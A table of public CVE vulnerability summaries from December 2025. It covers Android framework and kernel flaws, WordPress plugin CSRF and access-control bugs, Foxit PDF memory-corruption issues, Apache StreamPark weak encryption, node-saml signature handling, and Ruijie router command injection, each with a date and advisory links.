| Google--Android | In startAlwaysOnVpn of Vpn.java, there is a possible way to disable always-on VPN due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48588 | https://android.googlesource.com/platform/frameworks/base/+/cabbb7da639520633ad318655d1b5fe1c685c78e https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of HeaderPrivacyIconsController.kt, there is a possible way to grand permissions across user due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48589 | https://android.googlesource.com/platform/frameworks/base/+/2aeba76a58c18f66502ecbba4c2e73a8d6e2928c https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In verifyAndGetBypass of AppOpsService.java, there is a possible method for a malicious app to prevent dialing emergency services under limited circumstances due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48590 | https://android.googlesource.com/platform/frameworks/base/+/848f944921756467dba98069ea33531a2f180373 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible way to read files from another user due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48591 | https://android.googlesource.com/platform/frameworks/base/+/3df02a7df8488e04e31ae1d9d081ed1b881dd6ad https://android.googlesource.com/platform/packages/services/Mms/+/43ca1053f0a09b6fd1503caaecb62967a497b554 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In initDecoder of C2SoftDav1dDec.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48592 | https://android.googlesource.com/platform/frameworks/av/+/8febdebcb5e8736ec013a7d64e70f50e87649b52 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In onUidImportance of DisassociationProcessor.java, there is a possible way to retain companion application privileges after disassociation due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48594 | https://android.googlesource.com/platform/frameworks/base/+/ea2bcc66534263fac4c337f1a5149704c2262169 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In appendFrom of Parcel.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48596 | https://android.googlesource.com/platform/frameworks/native/+/6ffdde944d4e0b440b1dfc1f232687299700e039 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible way to trick a user into accepting a permission due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48597 | https://android.googlesource.com/platform/frameworks/base/+/68170bad52250399d2e4a1a8023a3e7aeda1887d https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible way to alter the primary user's face unlock settings due to a confused deputy. This could lead to physical escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48598 | https://android.googlesource.com/platform/packages/apps/Settings/+/83447688f8e3e8f009f1e7d275a14ea00ee7953a https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of WifiScanModeActivity.java, there is a possible way to bypass a device config restriction due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48599 | https://android.googlesource.com/platform/packages/apps/Settings/+/7a792e0b8f68bc4aeb939af703790fd76b51ccbd https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple files, there is a possible way to reveal information across users due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48600 | https://android.googlesource.com/platform/packages/modules/IntentResolver/+/bbe2dc3fb85fac9053b427b6d3c4af3506e0d9b4 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible permanent denial of service due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48601 | https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In InputMethodInfo of InputMethodInfo.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48603 | https://android.googlesource.com/platform/frameworks/base/+/b4c6786312a217ad9dfd97041b2f1e2f77e39b94 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible way to read files from another user due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48604 | https://android.googlesource.com/platform/packages/services/Mms/+/c60a828b9fa18f67260775a46c752f353fcc0d43 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In preparePackage of InstallPackageHelper.java, there is a possible way for an app to appear hidden upon installation without a mechanism to uninstall it due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48606 | https://source.android.com/security/bulletin/android-16-qpr2 |
| Google--Android | In multiple locations, there is a possible way to create a large amount of app ops due to a logic error in the code. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48607 | https://android.googlesource.com/platform/frameworks/base/+/03d7040699148c961df09dec301d8a1e982ee231 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In isValidMediaUri of SettingsProvider.java, there is a possible cross user media read due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48608 | https://source.android.com/security/bulletin/android-16-qpr2 |
| Google--Android | In __pkvm_guest_relinquish_to_host of mem_protect.c, there is a possible configuration data leak due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48610 | https://android.googlesource.com/kernel/common/+/19fbea31785113700731f4b458d7e20d05777729 https://android.googlesource.com/kernel/common/+/cac44a0bcfc58c85082b13220b4adcac43ccf369 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible way for an application on a work profile to set the main user's default NFC payment setting due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48612 | https://android.googlesource.com/platform/packages/apps/Settings/+/aa744e8988f0e7b77a71087edd4d2546b58d2f24 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In rebootWipeUserData of RecoverySystem.java, there is a possible way to factory reset the device while in DSU mode due to a missing permission check. This could lead to physical denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48614 | https://android.googlesource.com/platform/frameworks/base/+/ec0c32ea736ba3c594352c345358a778334bc773 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In getComponentName of MediaButtonReceiverHolder.java, there is a possible desync in persistence due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48615 | https://android.googlesource.com/platform/frameworks/base/+/a5795fc0cf1f21da88cf05ad06610d3653d1be0e https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In processLaunchBrowser of CommandParamsFactory.java, there is a possible browser interaction from the lockscreen due to improper locking. This could lead to physical escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48618 | https://android.googlesource.com/platform/frameworks/opt/telephony/+/fee68bcdcf029e8f40980616d09367610544bc62 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In onSomePackagesChanged of VoiceInteractionManagerService.java, there is a possible way for a third party application's component name to persist even after uninstalling due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48620 | https://android.googlesource.com/platform/frameworks/base/+/db86972777c84a386d8a6d2d34879923bdbccdf6 https://android.googlesource.com/platform/frameworks/base/+/84dd2b90f4a2ea1ebc5b78f08f14c5a3b92c9c2d https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In DefaultTransitionHandler.java, there is a possible way to enable a tapjacking attack due to a insecure default. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48621 | https://android.googlesource.com/platform/frameworks/native/+/cc34c7b416b964c05a42ae3e9c2929b59b92c64f https://android.googlesource.com/platform/frameworks/base/+/6d1697c96c5cae5062f6aea58cf2665b7d646cb8 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In ProcessArea of dng_misc_opcodes.cpp, there is a possible out of bounds read due to a buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48622 | https://android.googlesource.com/platform/external/skia/+/40c3f0a50fb9b47f543be0949f9004e77510f494 https://android.googlesource.com/platform/external/dng_sdk/+/de700ad461e35af50b28b861943a0b0753b10929 https://android.googlesource.com/platform/cts/+/1bcf948f5e555ad7b9b54549698c3e569d7a0af5 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In init_pkvm_hyp_vcpu of pkvm.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48623 | https://android.googlesource.com/kernel/common/+/3b6fab0ff24f7108c71a4d9c12567455cb2a5a81 https://android.googlesource.com/kernel/common/+/e76cff4952af4ac4652dc74ffbd134ff57c47895 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of arm-smmu-v3.c, there is a possible out-of-bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48624 | https://android.googlesource.com/kernel/common/+/0668e45a43398a07c3aa2ae08903097657efd87e https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations of UsbDataAdvancedProtectionHook.java, there is a possible way to access USB data when the screen is off due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48625 | https://source.android.com/security/bulletin/android-16-qpr2 |
| Google--Android | In multiple locations, there is a possible way to launch an application from the background due to a precondition check failure. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48626 | https://android.googlesource.com/platform/packages/apps/Launcher3/+/7628af9bf77f1d145359bf4075a6674574cae496 https://android.googlesource.com/platform/frameworks/base/+/9fb37191609f7cb7b2374531cafb2d00ec8b4bec https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to launch an activity from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48627 | https://android.googlesource.com/platform/frameworks/base/+/d34ae40f870d4362a069940a035a4d58a536a231 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In validateIconUserBoundary of PrintManagerService.java, there is a possible cross-user image leak due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48628 | https://android.googlesource.com/platform/frameworks/base/+/9489a5dcd3cdd426d5b39d9caf6bb78142af2399 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In findAvailRecognizer of VoiceInteractionManagerService.java, there is a possible way to become the default speech recognizer app due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48629 | https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In onHeaderDecoded of LocalImageResolver.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48631 | https://android.googlesource.com/platform/frameworks/base/+/d6df825fda3aa29cff7af05357005322152210fd https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In setDisplayName of AssociationRequest.java, there is a possible way to cause CDM associations to persist after the user has disassociated them due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48632 | https://android.googlesource.com/platform/frameworks/base/+/de27b16b1af86d4ce18c9134d85b53331a8d2147 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In hasAccountsOnAnyUser of DevicePolicyManagerService.java, there is a possible way to add a Device Owner after provisioning due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48633 | https://android.googlesource.com/platform/frameworks/base/+/d00bcda9f42dcf272d329e9bf9298f32af732f93 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of mem_protect.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48637 | https://android.googlesource.com/kernel/common/+/4cfc9c2d8815577832cafbfcd7f98025f0da718d https://android.googlesource.com/kernel/common/+/aff2255dbe38dc7c57bac8d3ba9feed989289b20 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In __pkvm_load_tracing of trace.c, there is a possible out-of-bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48638 | https://android.googlesource.com/kernel/common/+/0429b7af308cf65c84109c08d06b01950dcd57fe https://android.googlesource.com/kernel/common/+/96ebe96170d67df5072afa2ce84622f5a0ff552a https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In DefaultTransitionHandler.java, there is a possible way to unknowingly grant permissions to an app due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48639 | https://android.googlesource.com/platform/frameworks/native/+/cc34c7b416b964c05a42ae3e9c2929b59b92c64f https://android.googlesource.com/platform/frameworks/base/+/6d1697c96c5cae5062f6aea58cf2665b7d646cb8 https://source.android.com/security/bulletin/2025-12-01 |
| Alex Furr--PDF Creator Lite | Cross-Site Request Forgery (CSRF) vulnerability in Alex Furr PDF Creator Lite pdf-creator-lite allows Stored XSS. This issue affects PDF Creator Lite: from n/a through <= 1.2. | 2025-12-09 | not yet calculated | CVE-2025-49341 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-creator-lite/vulnerability/wordpress-pdf-creator-lite-plugin-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Jupitercow--WP sIFR | Cross-Site Request Forgery (CSRF) vulnerability in Jupitercow WP sIFR wp-sifr allows Stored XSS. This issue affects WP sIFR: from n/a through <= 0.6.8.1. | 2025-12-09 | not yet calculated | CVE-2025-49347 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-sifr/vulnerability/wordpress-wp-sifr-plugin-0-6-8-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Hype--Hype | Missing Authorization vulnerability in Hype Hype pico allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hype: from n/a through <= 1.0.5. | 2025-12-09 | not yet calculated | CVE-2025-49348 | https://vdp.patchstack.com/database/Wordpress/Plugin/pico/vulnerability/wordpress-hype-plugin-1-0-5-broken-access-control-vulnerability?_s_id=cve |
| marcoingraiti--Actionwear products sync | Missing Authorization vulnerability in marcoingraiti Actionwear products sync actionwear-products-sync allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Actionwear products sync: from n/a through <= 2.3.3. | 2025-12-09 | not yet calculated | CVE-2025-49350 | https://vdp.patchstack.com/database/Wordpress/Plugin/actionwear-products-sync/vulnerability/wordpress-actionwear-products-sync-plugin-2-3-3-broken-access-control-vulnerability?_s_id=cve |
| Valentin Agachi--Create Posts & Terms | Cross-Site Request Forgery (CSRF) vulnerability in Valentin Agachi Create Posts & Terms create-posts-terms allows Stored XSS. This issue affects Create Posts & Terms: from n/a through <= 1.3.1. | 2025-12-09 | not yet calculated | CVE-2025-49351 | https://vdp.patchstack.com/database/Wordpress/Plugin/create-posts-terms/vulnerability/wordpress-create-posts-terms-plugin-1-3-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| n/a--PagerDuty Runbook | PagerDuty Runbook through 2025-06-12 exposes stored secrets directly in the webpage DOM at the configuration page. Although these secrets appear masked as password fields, the actual secret values are present in the page source and can be revealed by simply modifying the input field type from "password" to "text" using browser developer tools. This vulnerability is exploitable by administrative users who have access to the configuration page. | 2025-12-10 | not yet calculated | CVE-2025-52493 | https://www.praetorian.com https://www.pagerduty.com/security/disclosure/ https://www.pagerduty.com/platform/automation/ https://github.com/carterross2/Vulnerability-Research/tree/main/CVE-2025-52493 |
| Japan Total System Co.,Ltd.--GroupSession Free edition | Stored cross-site scripting vulnerabilities exist in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. A logged-in user can prepare a malicious page or URL, and an arbitrary script may be executed on the web browser when another user accesses it. | 2025-12-12 | not yet calculated | CVE-2025-53523 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| Apache Software Foundation--Apache StreamPark | When encrypting sensitive data, weak encryption keys that are fixed or directly generated based on user passwords are used. Attackers can obtain these keys through methods such as reverse engineering, code leaks, or password guessing, thereby decrypting stored or transmitted encrypted data, leading to the leakage of sensitive information. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue. | 2025-12-12 | not yet calculated | CVE-2025-53960 | https://lists.apache.org/thread/xlpvfzf5l5m5mfyjwrz5h4dssm3c32vy |
| node-saml--node-saml | Node-SAML is a SAML library not dependent on any frameworks that runs in Node. In versions 5.0.1 and below, Node-SAML loads the assertion from the (unsigned) original response document. This is different than the parts that are verified when checking signature. This allows an attacker to modify authentication details within a valid SAML assertion. For example, in one attack it is possible to remove any character from the SAML assertion username. This issue is fixed in version 5.1.0. | 2025-12-12 | not yet calculated | CVE-2025-54369 | https://github.com/node-saml/node-saml/security/advisories/GHSA-m837-g268-mmv7 https://github.com/node-saml/node-saml/commit/31ead9411ebc3e2385086fa9149b6c17732bca10 https://github.com/node-saml/node-saml/releases/tag/v5.1.0 |
| Japan Total System Co.,Ltd.--GroupSession Free edition | Stored cross-site scripting vulnerability exists in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. If a user accesses a crafted page or URL, an arbitrary script may be executed on the web browser of the user. | 2025-12-12 | not yet calculated | CVE-2025-54407 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| Canonical--apport | It was discovered that process_crash() in data/apport in Canonical's Apport crash reporting tool may create crash files with incorrect group ownership, possibly exposing crash information beyond expected or intended groups. | 2025-12-10 | not yet calculated | CVE-2025-5467 | https://www.stratascale.com/resource/cve-2025-32462-ubuntu-apport-vulnerability/ https://bugs.launchpad.net/apport/+bug/2106338 |
| Yandex--Messenger | Uncontrolled Search Path Element vulnerability in Yandex Messenger on MacOS allows Search Order Hijacking. This issue affects Telemost: before 2.245 | 2025-12-09 | not yet calculated | CVE-2025-5469 | https://yandex.com/bugbounty/i/hall-of-fame-products |
| Yandex--Disk | Uncontrolled Search Path Element vulnerability in Yandex Disk on MacOS allows Search Order Hijacking. This issue affects Disk: before 3.2.45.3275. | 2025-12-09 | not yet calculated | CVE-2025-5470 | https://yandex.com/bugbounty/i/hall-of-fame-products |
| Yandex--Telemost | Uncontrolled Search Path Element vulnerability in Yandex Telemost on MacOS allows Search Order Hijacking. This issue affects Telemost: before 2.19.1. | 2025-12-09 | not yet calculated | CVE-2025-5471 | https://yandex.com/bugbounty/i/hall-of-fame-products |
| Apache Software Foundation--Apache StreamPark | In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue. | 2025-12-12 | not yet calculated | CVE-2025-54947 | https://lists.apache.org/thread/kdntmzyzrco75x9q6mc6s8lty1fxmog1 |
| Apache Software Foundation--Apache StreamPark | Weak Encryption Algorithm in StreamPark, The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue. | 2025-12-12 | not yet calculated | CVE-2025-54981 | https://lists.apache.org/thread/9rbvdvwg5fdhzjdgyrholgso53r26998 |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows before 13.2 and 2025 before 2025.2. Opening a malicious PDF containing a crafted JavaScript call to search.query() with a crafted cDIPath parameter (e.g., "/") may cause an out-of-bounds read in internal path-parsing logic, potentially leading to information disclosure or memory corruption. | 2025-12-11 | not yet calculated | CVE-2025-55307 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows before 13.2 and 2025 before 2025.2. A crafted PDF containing JavaScript that calls closeDoc() while internal objects are still in use can cause premature release of these objects. This use-after-free vulnerability may lead to memory corruption, potentially resulting in information disclosure when the PDF is opened. | 2025-12-11 | not yet calculated | CVE-2025-55308 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. A crafted PDF can contain JavaScript that attaches an OnBlur action on a form field that destroys an annotation. During user right-click interaction, the program's internal focus change handling prematurely releases the annotation object, resulting in a use-after-free vulnerability that may cause memory corruption or application crashes. | 2025-12-11 | not yet calculated | CVE-2025-55309 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. An attacker able to alter or replace the static HTML files used by the StartPage feature can cause the application to load malicious or compromised content upon startup. This may result in information disclosure, unauthorized data access, or other security impacts. | 2025-12-11 | not yet calculated | CVE-2025-55310 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. A crafted PDF can use JavaScript to alter annotation content and subsequently clear the file's modification status via JavaScript interfaces. This circumvents digital signature verification by hiding document modifications, allowing an attacker to mislead users about the document's integrity and compromise the trustworthiness of signed PDFs. | 2025-12-11 | not yet calculated | CVE-2025-55311 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows before 13.2 and 2025 before 2025.2. When pages in a PDF are deleted via JavaScript, the application may fail to properly update internal states. Subsequent annotation management operations assume these states are valid, causing dereference of invalid or released memory. This can lead to memory corruption, application crashes, and potentially allow an attacker to execute arbitrary code. | 2025-12-11 | not yet calculated | CVE-2025-55312 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. They allow potential arbitrary code execution when processing crafted PDF files. The vulnerability stems from insufficient handling of memory allocation failures after assigning an extremely large value to a form field's charLimit property via JavaScript. This can result in memory corruption and may allow an attacker to execute arbitrary code by persuading a user to open a malicious file. | 2025-12-11 | not yet calculated | CVE-2025-55313 | https://www.foxit.com/support/security-bulletins.html |
| n/a--Foxit PDF and Editor | An issue was discovered in Foxit PDF and Editor for Windows and macOS before 13.2 and 2025 before 2025.2. When pages in a PDF are deleted via JavaScript, the application may fail to properly update internal states. Subsequent annotation management operations assume these states are valid, causing dereference of invalid or released memory. This can lead to memory corruption, application crashes, and potentially allow an attacker to execute arbitrary code. | 2025-12-11 | not yet calculated | CVE-2025-55314 | https://www.foxit.com/support/security-bulletins.html |
| n/a--HotelDruid v3.0.7 and before | HotelDruid v3.0.7 and before is vulnerable to Cross Site Scripting (XSS) in the /modifica_app.php file. | 2025-12-11 | not yet calculated | CVE-2025-55816 | https://www.hoteldruid.com/en/ https://www.partywave.site/show/research/cve-2025-55816-xss-and-raptx |
| n/a--Ruijie RG-RAP2200(E) 247 2200 | OS Command Injection vulnerability in Ruijie RG-RAP2200(E) 247 2200 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56077 | https://1drv.ms/t/c/12406a392c92914b/EURTWAoIJNRMtvzNPi08CToB780nsKPNHZ2Fdmcf9xsoRA?e=jHygdj https://1drv.ms/f/c/12406a392c92914b/EvnzTspA23NAl-T9w70dG4MBnWWojsrzAeM1i-ed2EauAA?e=AYOxPM https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56077.md |
| n/a--Ruijie RG-EW1300G EW1300G V1.00/V2.00/V4.00 | OS Command Injection vulnerability in Ruijie RG-EW1300G EW1300G V1.00/V2.00/V4.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | 2025-12-11 | not yet calculated | CVE-2025-56079 | https://1drv.ms/t/c/12406a392c92914b/EZdYNxRd8ilMrCRXLnltUKEBiBXJzrTc9i7Y643cuho9PA?e=7Bifxw https://1drv.ms/f/c/12406a392c92914b/EjGDN1e4xfZOhROI3hzjKr0Bb9TVCN03MAR_VK56P8V3Ug?e=NmUXvt https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56079.md |
| n/a--Ruijie RG-BCR RG-BCR600W | OS Command Injection vulnerability in Ruijie RG-BCR RG-BCR600W allowing attackers to execute arbitrary commands via a crafted POST request to the check_changes in file /usr/lib/lua/luci/controller/admin/common.lua. | 2025-12-11 | not yet calculated | CVE-2025-56082 | https://1drv.ms/t/c/12406a392c92914b/EfCFw0RRV0hJvpV0rBLvTvABtWGVbrHzIPwPyku7phQ3Dg?e=GMqLpV https://1drv.ms/f/c/12406a392c92914b/Evvem8Mw6SlNh-ZJpY_9SAsBq2iDi88TFdFdA1Am3PdfCQ?e=YeLYxb https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56082.md |
| n/a--Ruijie X30-PRO X30-PRO-V1_09241521 | OS Command Injection vulnerability in Ruijie X30-PRO X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_networkId_merge.lua. | 2025-12-11 | not yet calculated | CVE-2025-56083 | https://1drv.ms/t/c/12406a392c92914b/EciYj-O9Oi1PgNsZdTao0iwBub3gdfqA3safE0A4I9foYg?e=Mi39JB https://1drv.ms/f/c/12406a392c92914b/EtGIxwWujwxBvQhL9wgnUIwBkg-mndJJX07Igr6d0cic-g?e=4KJbWY https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56083.md |
| n/a--Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117 | OS Command Injection vulnerability in Ruijie RG-EW1800GX PRO B11P226_EW1800GX-PRO_10223117 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua. | 2025-12-11 | not yet calculated | CVE-2025-56084 | https://1drv.ms/t/c/12406a392c92914b/EdfdfnvOxAhJqdeIGlRRo6ABHJz03PPPBYIMdLoD6iNhlg?e=qNhi6o https://1drv.ms/f/c/12406a392c92914b/Eohr-0awt6VAuiLCNhCG0rgBLQip6nJpl-9Hy0OqB4MvFg?e=DIfBxi https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56084.md |
| n/a--Ruijie RG-EW1200 EW_3.0(1)B11P227_EW1200_11130208RG-EW1200 V1.00 | OS Command Injection vulnerability in Ruijie RG-EW1200 EW_3.0(1)B11P227_EW1200_11130208RG-EW1200 V1.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_config/config_retain.lua. | 2025-12-11 | not yet calculated | CVE-2025-56085 | https://1drv.ms/t/c/12406a392c92914b/ERuoK3MLW2RLpQ6qOoGs5wIB73tNnsDzRT8U6U6z4VmskQ?e=KIjaOa https://1drv.ms/f/c/12406a392c92914b/EuESCSUsYvtAtfW1SfmGGxsBw-kN9iCbpnUU9T8TXofH3w?e=kp5OXK https://github.com/flegoity/Ruijie-Multiple-Devices-Vulnerability-Reports-for-CVE/blob/main/CVE-2025-56085.md |
